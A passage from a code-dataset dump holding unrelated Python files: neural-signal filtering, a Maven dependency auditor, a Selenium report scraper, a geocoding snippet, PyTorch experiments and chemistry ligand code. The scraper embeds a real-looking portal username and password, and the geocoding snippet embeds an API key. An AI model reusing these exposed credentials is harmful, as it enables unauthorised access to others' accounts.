< 3000):\n crime.save()\n","sub_path":"carolina/techtogether/airbnbtech/management/commands/load_air_bnb_data.py","file_name":"load_air_bnb_data.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"204221871","text":"import numpy as np\nfrom scipy import signal\nimport scipy.stats as stats\nfrom scipy.signal.signaltools import _next_regular\n\nimport matplotlib.pyplot as plt\n\ndef butter_bandpass(lowcut, highcut, fs, lfp, order=4):\n \"\"\" Filters signal using butterworth filter\n\n Parameters\n ----------\n lowcut : float\n Suggested 140.0 for sharp-wave ripple detection.\n highcut : float\n Suggested 250.0 for sharp-wave ripple detection.\n fs : int\n Eg. 2000. Should get this from experiment-specifics.\n lfp : np.array\n Eg. csc['data']\n order : int\n Default set to 4.\n\n Returns\n -------\n filtered_butter : np.array\n\n \"\"\"\n nyq = 0.5 * fs\n low = lowcut / nyq\n high = highcut / nyq\n b, a = signal.butter(order, [low, high], btype='band')\n filtered_butter = signal.filtfilt(b, a, lfp)\n return filtered_butter\n\n\ndef detect_swr_hilbert(csc, fs=2000, lowcut=140.0, highcut=250.0,\n z_thres=3, power_thres=3, merge_thres=0.02, min_length=0.01):\n \"\"\" Finds sharp-wave ripple (SWR) times and indices.\n\n Parameters\n ----------\n csc : dict\n With time(np.array), data(np.array) as keys\n fs : int\n Experiment-specific, something in the range of 2000 is not unexpected.\n lowcut : float\n The default is set to 140.0\n highcut : float\n The default is set to 250.0\n z_thres : int or float\n The default is set to 5\n power_thres : int or float\n The default is set to 4\n merge_thres : int or float\n The default is set to 0.0\n min_length : float\n Any sequence less than this amount is not considered a sharp-wave ripple.\n The default is set to 0.02.\n\n Returns\n -------\n swr_times : dict\n With start(float), stop(float) as keys\n swr_idx : dict\n With start(int), stop(int) as keys\n filtered_butter : np.array\n Mostly for plotting purposes\n\n \"\"\"\n n_samples = len(csc['data'])\n\n # Filtering signal with butterworth fitler\n filtered_butter = butter_bandpass(lowcut, highcut, fs, csc['data'])\n\n # Get LFP power (using Hilbert) and z-score the power\n # Zero padding to nearest regular number to speed up fast fourier transforms (FFT) computed in the hilbert function.\n # Regular numbers are composites of the prime factors 2, 3, and 5.\n hilbert_n = _next_regular(n_samples)\n power_lfp = np.abs(signal.hilbert(filtered_butter, N=hilbert_n))\n power_lfp = power_lfp[:n_samples] # removing the zero padding now that the power is computed\n zpower_lfp = stats.zscore(power_lfp)\n\n # Finding locations where the power changes\n detect = zpower_lfp > z_thres\n detect = np.hstack([0, detect, 0]) # pad to detect first or last element change\n signal_change = np.diff(detect.astype(int))\n\n start_swr_idx = np.where(signal_change == 1)[0]\n stop_swr_idx = np.where(signal_change == -1)[0] - 1\n\n # Getting times associated with these power changes\n start_time = csc['time'][start_swr_idx]\n stop_time = csc['time'][stop_swr_idx]\n\n # Merging ranges that are closer - in time - than the merge_threshold.\n no_double = start_time[1:] - stop_time[:-1]\n merge_idx = np.where(no_double < merge_thres)[0]\n start_merged = np.delete(start_time, merge_idx + 1)\n stop_merged = np.delete(stop_time, merge_idx)\n start_merged_idx = np.delete(start_swr_idx, merge_idx + 1)\n stop_merged_idx = np.delete(stop_swr_idx, 
merge_idx)\n\n # Removing ranges that are shorter - in time - than the min_length value.\n swr_len = stop_merged - start_merged\n short_idx = np.where(swr_len < min_length)[0]\n start_merged = np.delete(start_merged, short_idx)\n stop_merged = np.delete(stop_merged, short_idx)\n start_merged_idx = np.delete(start_merged_idx, short_idx)\n stop_merged_idx = np.delete(stop_merged_idx, short_idx)\n\n # Removing ranges that have powers less than the power_threshold if sufficiently different.\n if power_thres > z_thres:\n max_z = []\n for start_idx, stop_idx in zip(start_merged_idx, stop_merged_idx):\n max_z.append(np.max(zpower_lfp[start_idx:stop_idx]))\n max_z = np.array(max_z)\n\n z_idx = np.where(max_z < power_thres)[0]\n start_merged = np.delete(start_merged, z_idx)\n stop_merged = np.delete(stop_merged, z_idx)\n start_merged_idx = np.delete(start_merged_idx, z_idx)\n stop_merged_idx = np.delete(stop_merged_idx, z_idx)\n\n swr_idx = dict()\n swr_times = dict()\n swr_times['start'] = start_merged\n swr_times['stop'] = stop_merged\n swr_idx['start'] = start_merged_idx\n swr_idx['stop'] = stop_merged_idx\n\n print('Number of SWR events found: ', str(len(swr_idx['start'])))\n\n return swr_times, swr_idx\n","sub_path":"vdmlab/lfp_filtering.py","file_name":"lfp_filtering.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"121004682","text":"import os\nimport re\nimport sys\nfrom xml.dom.minidom import parse\nimport xml.dom.minidom\nimport requests\nimport xlwt\nimport subprocess\n\n\nclass Pom(object):\n def __init__(self, path):\n self.path = path\n parse = xml.dom.minidom.parse(path)\n root = parse.documentElement\n artifacts = root.getElementsByTagName('artifactId')\n for artifact in artifacts:\n if artifact.parentNode.tagName == 'project':\n self.module_name = artifact.firstChild.data\n\n\nclass Dependency(object):\n def __init__(self, group_id, artifact_id, version, module):\n self.group_id = group_id\n self.artifact_id = artifact_id\n self.version = version\n self.module = module\n\n def __str__(self):\n return self.group_id + ':' + self.artifact_id + ':' + self.version + '(' + self.module + ')'\n\n def equals(self, target):\n return self.group_id == target.group_id and self.artifact_id == target.artifact_id and self.version == target.version\n\n\ndef search_pom(path):\n result_list = []\n for root, dirs, files in os.walk(path):\n for file in files:\n file_path = os.path.join(root, file)\n if file_path.endswith('pom.xml'):\n result_list.append(Pom(file_path))\n return result_list\n\n\ndef read_file(file_path):\n for root, dirs, files in os.walk(file_path):\n for file in files:\n join = os.path.join(root, file)\n if join.endswith('txt'):\n with open(join, 'r') as r:\n read = r.read()\n split = read.split('\\n')\n for _i in split:\n findall = re.findall('^[^a-zA-Z]*', _i)\n _i = _i.replace(findall[0], '')\n if _i.strip() != '':\n i_split = _i.split(':')\n dependency = Dependency(i_split[0], i_split[1], i_split[3], file.replace('.txt', ''))\n yield dependency\n\n\nif __name__ == '__main__':\n code_path = '/Users/wangxiaolei/Documents/ody/code/baseline/web/ouser'\n settings_xml = '/Users/wangxiaolei/Documents/ody/mvn/2.9.6/settings.xml'\n current_file_path = '/Users/wangxiaolei/Documents/code/workspace/maven'\n mvn_cmd = 'mvn'\n run_cmd = True\n district = True\n warehouse_list = [\n {'name': 'aliyun', 'path': 'https://maven.aliyun.com/nexus/content/groups/public/',\n 'func': lambda text, 
dependency: text.__contains__(dependency.artifact_id)},\n {'name': 'maven', 'path': 'https://repo.maven.apache.org/maven2/',\n 'func': lambda text, dependency: text.__contains__(dependency.artifact_id)}\n ]\n\n if run_cmd:\n poms = search_pom(code_path)\n size = poms.__len__()\n print('需要执行mvn tree,一共发现%s个pom.xml文件' % size)\n run_index = 1\n for i in poms:\n cmd = [mvn_cmd, 'dependency:tree', '-s', settings_xml, '-D',\n 'outputFile=' + current_file_path + '/' + i.module_name + '.txt', '-f', i.path]\n print('开始执行第 %s/%s 个,命令为 %s' % (run_index, size, cmd))\n subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)\n print('第 %s/%s 个执行成功!' % (run_index, size))\n run_index = run_index + 1\n print('mvn tree全部执行完成!')\n\n dependency_list = []\n for i in read_file(current_file_path):\n if district:\n has_in = False\n for j in dependency_list:\n if j.equals(i):\n has_in = True\n break\n if not has_in:\n dependency_list.append(i)\n else:\n dependency_list.append(i)\n workbook = xlwt.Workbook(encoding='utf-8')\n sheet = workbook.add_sheet('sheet')\n\n row = 1\n sheet.write(0, 0, 'groupId')\n sheet.write(0, 1, 'artifactId')\n sheet.write(0, 2, 'version')\n sheet.write(0, 3, '是否自建')\n sheet.write(0, 4, '哪个module引用的')\n sheet.write(0, 5, '在哪个仓库找到')\n\n total = dependency_list.__len__()\n print('一共有%s个依赖需要处理' % total)\n\n self_build = 0\n global_build = 0\n\n for i in dependency_list:\n full_url = '/'.join(i.group_id.split(\n '.')) + '/' + i.artifact_id + '/' + i.version + '/' + i.artifact_id + '-' + i.version + '.pom'\n exist = False\n for j in warehouse_list:\n real_path = j['path'] + full_url\n exist = j['func'](requests.get(real_path).text, i)\n if exist:\n sheet.write(row, 0, i.group_id)\n sheet.write(row, 1, i.artifact_id)\n sheet.write(row, 2, i.version)\n sheet.write(row, 3, 'false')\n if district:\n sheet.write(row, 4, i.module)\n sheet.write(row, 5, j['name'])\n else:\n sheet.write(row, 4, j['name'])\n row = row + 1\n global_build = global_build + 1\n break\n if not exist:\n sheet.write(row, 0, i.group_id)\n sheet.write(row, 1, i.artifact_id)\n sheet.write(row, 2, i.version)\n sheet.write(row, 3, 'true')\n if district:\n sheet.write(row, 4, i.module)\n row = row + 1\n self_build = self_build + 1\n print('目前处理进度%s/%s,其中自建的%s个,公共的%s个' % (self_build + global_build, total, self_build, global_build))\n print('处理完成,开始保存excel')\n workbook.save('./dependency.xls')\n print('excel保存成功!')\n","sub_path":"maven/maven_api.py","file_name":"maven_api.py","file_ext":"py","file_size_in_byte":5682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"298905744","text":"from selenium import webdriver\nimport time\nfrom selenium.webdriver.common import by\nfrom datetime import datetime, timedelta\nfrom selenium.webdriver.remote.switch_to import SwitchTo\nfrom selenium.webdriver.common.by import By\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport shutil\nimport os\nimport glob\nimport time\nmanana= datetime.today() + timedelta(days=1)\nfecha=\"activacion_\"+str(manana.strftime(\"%d%m%y\"))+\".xlsx\"\n\n\ndriver=webdriver.Chrome(executable_path=r'./chromedriver.exe')\n\ndriver.get('https://recargas.claro.com.ni:4446/pretups/')\n\ntxt_usuario='#loginID'\ntxt_contraseña='#password'\nbtn_entrar_sistema='body > form:nth-child(2) > table:nth-child(6) > tbody > tr > td > table:nth-child(2) > tbody > tr:nth-child(5) > td.tabcol > 
input:nth-child(1)'\ntime.sleep(5)\ndriver.find_element_by_css_selector(txt_usuario).send_keys('DIST_METROP')\ndriver.find_element_by_css_selector(txt_contraseña).send_keys('METRO#2022')\ndriver.find_element_by_css_selector(btn_entrar_sistema).click()\n\ntime.sleep(10)\n\n ############################################################\na= driver.find_elements_by_tag_name('frame')\ndriver.switch_to.frame(a[0])\n ############################################################\n\ndriver.find_element_by_link_text('Channel reports-C2S').click()\ntime.sleep(8)\n ### seleccionar jerarquia\n\nelement = driver.find_element_by_name(\"serviceType\")\ntime.sleep(8)\n\nwebElem=driver.find_element_by_xpath(\"//*[(@value = 'ALL')]\")\nwebElem.click()\ntime.sleep(8)\n\nselect=driver.find_element_by_name(\"transferStatus\")\nselect.click()\ntime.sleep(8)\n\nwebElem=driver.find_element_by_xpath(\"//*[(@value = '200')]\")\nwebElem.click()\ntime.sleep(8)\n\nfechainicio=driver.find_element_by_name(\"currentDate\")\n\nfecha_a=datetime.strftime((datetime.today()),'%d/%m/%y')\n \nfechainicio.send_keys(fecha_a)\n\ntime.sleep(9)\n\nhora_inicial=\"00:00\"\nhora_final=\"23:59\"\n\nfechafin=driver.find_element_by_name(\"fromTime\")\nfechafin.send_keys(hora_inicial)\ntime.sleep(8)\n\n\nfechafin=driver.find_element_by_name(\"toTime\")\nfechafin.send_keys(hora_final)\ntime.sleep(8)\n\nbtnE=driver.find_element_by_name(\"submitButton\")\nbtnE.click()\ntime.sleep(30)\n #get current window handle\np = driver.current_window_handle\n\n #get first child window#get first child window\nchwd = driver.window_handles\ndriver.switch_to.window(chwd[1])\ndriver.maximize_window()\nprint(\"Child window title: \" + driver.title)\n\ntime.sleep(15)\n\nsaverpt=driver.find_element_by_id(\"save\")\nsaverpt.click()\ntime.sleep(8)\n\nsaverpt =driver.find_element_by_xpath(\"//*[@id='__menuBar']/div[6]/ul/li[1]/div\")\nsaverpt.click()\ntime.sleep(8)\n\nsaverpt =driver.find_element_by_xpath(\"//*[@id='__menuBar']/div[6]/ul/li[1]/div/ul/li[4]\")\nsaverpt.click()\ntime.sleep(8)\n\nsaverpt =driver.find_element_by_id(\"ok\")\nsaverpt.click()\n\ntime.sleep(4)\n\ndriver.quit()\n\n\n\n##MODELADO DE LA DATA\n##########################################################################\n# #\\\\192.168.0.85\\Users\\50576\\Desktop\\python\np_open=pd.read_excel(r'C:\\Users\\50576\\Downloads\\c2sTransferChannelUserNew.xlsx')\n\np_open_=pd.DataFrame(p_open)\np_open_=p_open_.drop([0,1,2,3,4,5,6,7,8,9,10,11,12])\np_open_=p_open_.drop(['Unnamed: 0', 'Unnamed: 1', 'Unnamed: 3','Unnamed: 9','Unnamed: 17','Unnamed: 18'], axis=1)\np_open_= p_open_.dropna(axis=0, subset=['Unnamed: 2'])\np_open_.rename(columns={'Unnamed: 2':\"transferencia\",\n'Unnamed: 4':\"tipo\",\n'Unnamed: 5':\"cliente\",\n'Unnamed: 6':\"pos\",\n'Unnamed: 7':\"service\",\n'Unnamed: 8':\"pos_final\",\n'Unnamed: 13':\"monto\"\n},inplace=True)\np_open_.reset_index(inplace=True,drop=True) \n\np_open_=pd.DataFrame(p_open_[\n [\"transferencia\",\n \"tipo\",\n \"cliente\",\n \"pos\", \n \"service\",\n \"pos_final\",\n \"monto\"]])\n\np_open_['fecha'] = p_open_['transferencia'].str.slice(1, 7)\n\np_open_.to_excel(r'C:\\Users\\50576\\Documents\\TAE\\Activacion\\%s' %fecha,engine='xlsxwriter',\nindex=False,sheet_name='Pagos Open')\n\nshutil.move(r'C:\\Users\\50576\\Downloads\\c2sTransferChannelUserNew.xlsx', 
r'C:\\Users\\50576\\AppData\\Local\\Temp\\data.xlsx')","sub_path":"NIC_EXTRAE_ACTIVACION_METROPOLITANA_CORTES.py","file_name":"NIC_EXTRAE_ACTIVACION_METROPOLITANA_CORTES.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"423001342","text":"#geocodedata\nimport requests\n\nrequest=requests.get(\"https://maps.googleapis.com/maps/api/geocode/json?address=Soho,+LondonA&key=AIzaSyC-SokDY6x6E0Qj7tjyLembaj5MdOLJjYE\") \n\ngeo_location = request.json()\n\n\nlocation = geo_location['results'][0]['geometry']['location']\n\n# the coordinates live in the nested 'location' dict, not the top-level response\nlonglat = location['lat'], location['lng']
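# A defensive sketch (added for illustration): the Geocoding API reports
# failures in the JSON 'status' field rather than via the HTTP status code;
# a robust version would check it before indexing into 'results'.
if geo_location.get('status') == 'OK':
    print('lat/lng:', longlat)
else:
    print('geocoding failed:', geo_location.get('status'))
# note the top-level response itself has no coordinate keys, i.e. not: longlat = geo_location['lat'], 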
geo_location['lng']\n","sub_path":"googlemaps.py","file_name":"googlemaps.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"278580139","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 23 12:55:40 2019\n\n@author: daniele\n\"\"\"\n#%%\nimport torch\nimport torch.nn as nn\nfrom torchvision import models\nfrom libraries.torchsummary import summary\nfrom libraries.model.options import Options, FullImagesOptions\nfrom libraries.model.network import FCN_Generator, EncoderTL, GeneratorTL\nfrom libraries.model.dataset import dataloaderPatchMasks\n\nfrom matplotlib import pyplot as plt\n#%%\nopt = Options()\nencTL = GeneratorTL(opt)\nencTL\n#%%\nsummary(encTL.cuda(), (3, 32, 32))\n\n#%%\nvgg = models.vgg16(pretrained=True).cuda()\nvgg\n#%%\nfor param in vgg.parameters():\n param.require_grad = False\n#%%\nsummary(vgg, (3,32,32))\n\n#%%\nmodules = list(vgg.children())[:-2]\nmodules.append(nn.Sequential(nn.Conv2d(512,100,(8,50))))\nmodules\n#%%\nmodules = list(vgg.children())[:-2][0]\nfeatures = list(modules)[:-3]\nencoder = nn.Sequential(*features)\nencoder.add_module('Final conv2D', nn.Conv2d(512, 1024, 2))\nencoder\n\n#%%\nencoder = nn.Sequential(*features)\nencoder\n#%%\nsummary(encoder.cuda(), (3,32,32))\n\n#%%\n\nencoder = nn.Sequential(*modules)\nencoder\n\n#%%\n\nsummary(encoder.cuda(), (3,256,1600))\n\n\n#%%\nk1, k2 = 3,3\n\ndecoder = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear'),\n nn.ConvTranspose2d(512, 256, (k1,k2), stride=1, padding=1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(),\n \n nn.Upsample(scale_factor=2, mode='bilinear'),\n nn.ConvTranspose2d(256, 128, (k1,k2), stride=1, padding=1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(),\n \n nn.Upsample(scale_factor=2, mode='bilinear'),\n nn.ConvTranspose2d(128, 64, (k1,k2), stride=1, padding=1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(),\n \n nn.Upsample(scale_factor=2, mode='bilinear'),\n nn.ConvTranspose2d(64, 32, (k1,k2), stride=1, padding=1),\n nn.BatchNorm2d(32),\n nn.LeakyReLU(),\n \n nn.Upsample(scale_factor=2, mode='bilinear'),\n nn.ConvTranspose2d(32, 16, (k1,k2), stride=1, padding=1),\n nn.BatchNorm2d(16),\n nn.LeakyReLU(),\n\n \n# nn.ConvTranspose2d(32, 3, (2,2), stride=2),\n## nn.Tanh(),\n nn.Conv2d(16, 1, 1),\n nn.Sigmoid()\n \n )\n#%%\n\nsummary(decoder.cuda(), (512,8,50))\nk1, k2 = 4, 25\n\ndecoder = nn.Sequential(\n nn.ConvTranspose2d(100, 1024, (k1,k2)),\n nn.BatchNorm2d(1024),\n nn.LeakyReLU(),\n \n nn.ConvTranspose2d(1024, 512, (k1,k1), stride=2, padding=1),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(),\n \n nn.ConvTranspose2d(512, 256, (k1,k1), stride=2, padding=1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(),\n \n nn.ConvTranspose2d(256, 128, (k1,k1), stride=2, padding=1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(),\n \n nn.ConvTranspose2d(128, 64, (k1,k1), stride=2, padding=1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(),\n \n nn.ConvTranspose2d(64, 32, (k1,k1), stride=2, padding=1),\n nn.BatchNorm2d(32),\n nn.LeakyReLU(),\n \n nn.ConvTranspose2d(32, 3, (2,2), stride=2),\n# nn.Tanh(),\n# nn.Conv2d(3, 1, (256,1600)),\n nn.Tanh()\n \n )\n\nsummary(decoder.cuda(), (100,1,1))\n#%%\nmodules = list(decoder.children())[:-1]\nmodules\na = nn.Sequential(*modules)\n\n#%%\n\nencoder = nn.Sequential(\n nn.Conv2d(3, 32, 4, stride=2),\n nn.LeakyReLU(),\n \n nn.Conv2d(32, 64, 4, stride=2),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(),\n \n nn.Conv2d(64, 128, 4, stride=2),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(),\n \n 
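    # (Added shape note) With padding=0, each stride-2, kernel-4 conv here maps
    # an input size `n` to floor((n - 4)/2) + 1, so a (3, 256, 1600) input
    # shrinks 256 -> 127 -> 62 -> 30 -> 14 -> 6 and
    # 1600 -> 799 -> 398 -> 198 -> 98 -> 48 over the five blocks; the final
    # Conv2d(512, 100, (6,48)) below then collapses that 6x48 map to a 1x1,
    # 100-channel code.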
nn.Conv2d(128, 256, 4, stride=2),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(),\n \n nn.Conv2d(256, 512, 4, stride=2),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(),\n \n nn.Conv2d(512, 100, (6,48)),\n# nn.BatchNorm2d(1024),\n# nn.LeakyReLU(),\n \n# nn.Conv2d(1024, 1024)\n \n )\n\n\nsummary(encoder.cuda(), (3,256,1600))\n#%%\nopt = Options()\ndec = Decoder(opt)\ndec\n\nsummary(dec.cuda(), (100,1,1))\n\n#%%\nmodel = FCN_Generator().cuda()\nmodel.encoder1\nmodel.encoder2\nmodel.decoder\nmodel.finalLayer\nmodel.fullyConvLayer\n#%%\n\nfullOpt = FullImagesOptions(start=0, end=100, batch_size=16)\ndataloader = dataloaderPatchMasks(fullOpt)\n\n#%%\ni = 0\n\nimage = dataloader['test'].dataset.data[i]\nplt.imshow(image)\nplt.show()\n\nlabel = dataloader['test'].dataset.targets[i]\nplt.imshow(label)\nplt.show()\n\n#%%\nfrom torchvision import models\n\nr18 = models.resnet18(pretrained=True)\n\n\n","sub_path":"v2/transfer_learning.py","file_name":"transfer_learning.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"176250093","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\nimport math\n\n\ndef calculate_hypotenuse(sideAB, sideBC):\n sidehypo = sideAB ** 2 + sideBC ** 2\n return math.sqrt(sidehypo)\n\n\ndef find_all_angles(sideBC, MC, MB):\n anlge_btw_MC_BC = (sideBC ** 2 + MC ** 2 - MB ** 2) / (2 * sideBC * MC)\n anlge_btw_MC_BC = math.degrees(math.acos(anlge_btw_MC_BC))\n print(str(round(anlge_btw_MC_BC)) + '\\u00b0')\n\n\ntry:\n # lines = []\n # while True:\n # line = input()\n # if line:\n # lines.append(line)\n # else:\n # break\n # # print(lines)\n # sideAB, sideBC = lines\n sideAB = input()\n sideBC = input()\n MB = calculate_hypotenuse(int(sideAB), int(sideBC)) / 2\n MC = MB\n # print(MB, MC)\n find_all_angles(int(sideBC), MC, MB)\nexcept Exception as e:\n print(e)\n","sub_path":"python_test.py","file_name":"python_test.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"101634814","text":"## @file ligand.py\n# Defines ligand class for postprocessing DFT results by measuring ligand properties\n# \n# Written by JP Janet for HJK Group\n# \n# Dpt of Chemical Engineering, MIT\n\nfrom molSimplify.Classes.mol3D import *\nfrom molSimplify.Classes.atom3D import *\nfrom molSimplify.Scripts.geometry import *\nfrom collections import Counter\n\n\n## Ligand class for postprocessing DFT results by measuring ligand properties\nclass ligand:\n ## Constructor\n # @param self The object pointer\n # @param master_mol A mol3D complex to extract ligand from\n # @param index_list A list of indices of the ligand atoms\n # @paran dent The denticity of the ligand\n def __init__(self, master_mol, index_list, dent):\n self.master_mol = master_mol\n self.index_list = index_list\n self.dent = dent\n self.ext_int_dict = dict() ## store\n\n ## map betweem\n ## int and ext indcies\n ## Obtain the ligand from the complex mol3D object\n # @param self The object pointer\n def obtain_mol3d(self):\n this_mol = mol3D()\n this_ext_int_dict = dict()\n j = 0\n for i in range(0, self.master_mol.natoms):\n if i in self.index_list:\n this_mol.addAtom(self.master_mol.getAtom(i))\n this_ext_int_dict.update({i: j})\n j += 1 # keep count of how many are added\n self.mol = this_mol\n self.ext_int_dict = this_ext_int_dict\n\n ## Truncate ligand about connecting atoms\n # @param self The object pointer\n # @param con_atoms The 
connection atom indices\n    # @param hops Number of bonds to truncate after\n    # @return Truncated mol3D object\n    def obtain_truncation(self, con_atoms, hops):\n        self.trunc_mol = mol3D()\n        added_list = list()\n        for connections in con_atoms:\n            hopped = 0\n            active_set = [connections]\n            while hopped < hops:\n                hopped += 1\n                new_active_set = list()\n                for this_atom in active_set:\n                    this_atoms_neighbors = self.master_mol.getBondedAtoms(this_atom)\n                    for bound_atoms in this_atoms_neighbors:\n                        if (bound_atoms in self.index_list) and (bound_atoms not in added_list):\n                            self.trunc_mol.addAtom(self.master_mol.getAtom(bound_atoms))\n                            added_list.append(bound_atoms)\n                        [new_active_set.append(element) for element in this_atoms_neighbors]\n                active_set = new_active_set\n        return self.trunc_mol\n\n\n## Extract axial and equatorial components of an octahedral complex\n# @param mol The mol3D object for the complex\n# @param liglist List of ligands\n# @return ligdents List of ligand dents\n# @return ligcons List of ligand connection indices (in mol)\n\n\ndef ligand_breakdown(mol, flag_loose=False):\n    # this function takes an octahedral\n    # complex and returns ligands\n    metal_index = mol.findMetal()[0]\n    bondedatoms = mol.getBondedAtomsOct(metal_index, CN=6, debug=False, flag_loose=flag_loose)\n    print('!!!!flagloose', flag_loose)\n    # bondedatoms = mol.getBondedAtomsSmart(metal_index)\n    print('!!!!!boundatoms', bondedatoms)\n    #\tprint('from get oct' + str(bondedatoms))\n    #\tprint('***\\n')\n    bonded_atom_symbols = [mol.getAtom(i).symbol() for i in bondedatoms]\n    counter = 0\n    liglist = []\n    ligdents = []\n    ligcons = []\n    for atom in bondedatoms:\n        # print('this atom type is ' + mol.getAtom(atom).symbol())\n        # print('connection number ' + str(atom) + \" of \" + str(bondedatoms))\n        fragment = mol.findsubMol(atom, metal_index)\n        this_cons = [x for x in fragment if (x in bondedatoms)]\n        unique = True\n        for i, unique_ligands in enumerate(liglist):\n            if fragment == unique_ligands:\n                unique = False\n                matched = i\n        if unique:\n            liglist.append(fragment)\n            ligdents.append(1)\n            ligcons.append(this_cons)\n        else:\n            ligdents[matched] += 1\n    return liglist, ligdents, ligcons\n\n\ndef ligand_assign(mol, liglist, ligdents, ligcons, loud=False, name=False):\n    valid = True\n    loud = False\n    metal_index = mol.findMetal()[0]\n    built_ligand_list = list()\n    lig_natoms_list = list()\n    unique_ligands = list()\n    ligand_counts = list()\n    all_ligand_counts = [0, 0, 0, 0, 0, 0]\n    ligand_records = list()\n    ax_con_int_list = list()\n    eq_con_int_list = list()\n    ax_natoms_list = list()\n    eq_natoms_list = list()\n    n_ligs = len(liglist)\n    max_dent = max(ligdents)\n    min_dent = min(ligdents)\n    if loud:\n        print('********************************************')\n        print(\"n_ligs = \" + str(n_ligs))\n        print(\"max d = \" + str(max_dent))\n        print(\"min_dent = \" + str(min_dent))\n        print(\"ligand list is\" + str(liglist))\n        print('denticities are ' + str(ligdents))\n    if (max(ligdents) == 4) and (min(ligdents) != 1):\n        valid = False\n        print('bad denticities: ' + str(ligdents))\n        print('min denticities: ' + str(min(ligdents)))\n    if max(ligdents) > 4:\n        valid = False\n        print('bad denticities: ' + str(ligdents))\n        print('max denticities: ' + str(min(ligdents)))\n    if n_ligs > 3 and min(ligdents) > 1:\n        valid = False\n        print('too many ligs ' + str((n_ligs)))\n    eq_lig_list = list()\n    ax_lig_list = list()\n    ax_con_list = list()\n    eq_con_list = list()\n    for i, ligand_indices in enumerate(liglist):\n        this_ligand = ligand(mol, ligand_indices, ligdents[i])\n        
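# wrap each fragment in a ligand object and extract its mol3D copy; the atom\n        # counts and symbol lists pulled from it drive the uniqueness binning below\n        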
this_ligand.obtain_mol3d()\n built_ligand_list.append(this_ligand)\n lig_natoms_list.append(this_ligand.mol.natoms)\n for j, built_ligs in enumerate(built_ligand_list):\n ### test if ligand is unique\n sl = [atom.symbol() for atom in built_ligs.mol.getAtoms()]\n if loud:\n print('checking lig ' + str(j) + ' : ' + str(sl))\n unique = 1\n for i, other_sl in enumerate(unique_ligands):\n if sorted(sl) == sorted(other_sl):\n # duplicate\n unique = 0\n ligand_counts[i] += 1\n if unique == 1:\n unique_ligands.append(sl)\n ligand_counts.append(1)\n ligand_records.append(j)\n ### loop to bin ligands:\n for j, built_ligs in enumerate(built_ligand_list):\n ### test if ligand is unique\n sl = [atom.symbol() for atom in built_ligs.mol.getAtoms()]\n unique = 1\n for i, other_sl in enumerate(unique_ligands):\n if sorted(sl) == sorted(other_sl):\n # duplicate\n # print(i,ligand_counts[i])\n all_ligand_counts[j] = ligand_counts[i]\n\n if loud:\n print('unique ligands' + str(unique_ligands))\n print('ligand counts' + str(ligand_counts))\n print('ligand records ' + str(ligand_records))\n print(str(max(ligand_counts)) + ' is the max and min in ' + str(min(ligand_counts)))\n n_unique_ligs = len(unique_ligands)\n if (n_ligs == 3) or (n_ligs == 4): # most common case,\n # one/two equitorial and 2 axial mono\n # or three bidentate\n for i, ligs in enumerate(liglist):\n if ligdents[i] == 1 and min_dent == 1: ## anything with equitorial monos will\n ## have higher than 4 n_ligs\n ax_lig_list.append(i)\n if loud:\n print('choosing ' + str(i) + ' as ax based on dent =1')\n ax_con_list.append(ligcons[i])\n if (ligdents[i] >= 2) and (min_dent == 1):\n eq_lig_list.append(i)\n if loud:\n print('choosing lig ' + str(i) + ' as eq based on high dent')\n eq_con_list.append(ligcons[i])\n if (n_ligs == 3) and (min_dent == max_dent):\n if n_unique_ligs == 1:\n # take any 2, they are all the same\n if loud:\n print('triple bidentate case')\n ax_lig_list.append(0)\n eq_lig_list.append(1)\n eq_lig_list.append(2)\n ax_con_list.append(ligcons[0])\n eq_con_list.append(ligcons[1])\n eq_con_list.append(ligcons[2])\n elif min_dent == 2 and max_dent == 2 and n_ligs == 3 and not n_unique_ligs == 1:\n ## this is a hetero/bidentate case\n for i, ligs in enumerate(liglist):\n if all_ligand_counts[i] == 2:\n eq_lig_list.append(i)\n eq_con_list.append(ligcons[i])\n elif all_ligand_counts[i] == 1:\n ax_lig_list.append(i)\n ax_con_list.append(ligcons[i])\n elif (n_ligs == 6): # all mono case,\n minz = 500\n maxz = -500\n if loud:\n print('monodentate case')\n allowed = range(0, 6)\n not_eq = list()\n for j, built_ligs in enumerate(built_ligand_list):\n this_z = built_ligs.mol.centermass()[2]\n if this_z < minz:\n minz = this_z\n bot_lig = j\n bot_con = ligcons[j]\n if loud:\n print('updating bot axial to ' + str(bot_lig))\n if this_z > maxz:\n maxz = this_z\n top_lig = j\n top_con = ligcons[j]\n if loud:\n print('updating top axial to ' + str(top_lig))\n not_eq.append(bot_lig)\n not_eq.append(top_lig)\n\n allowed = [x for x in allowed if ((x not in not_eq))]\n if len(allowed) != 4:\n print('error in decomp of monodentate case!', allowed)\n eq_lig_list = allowed\n eq_con_list = [ligcons[i] for i in allowed]\n ax_lig_list = [top_lig, 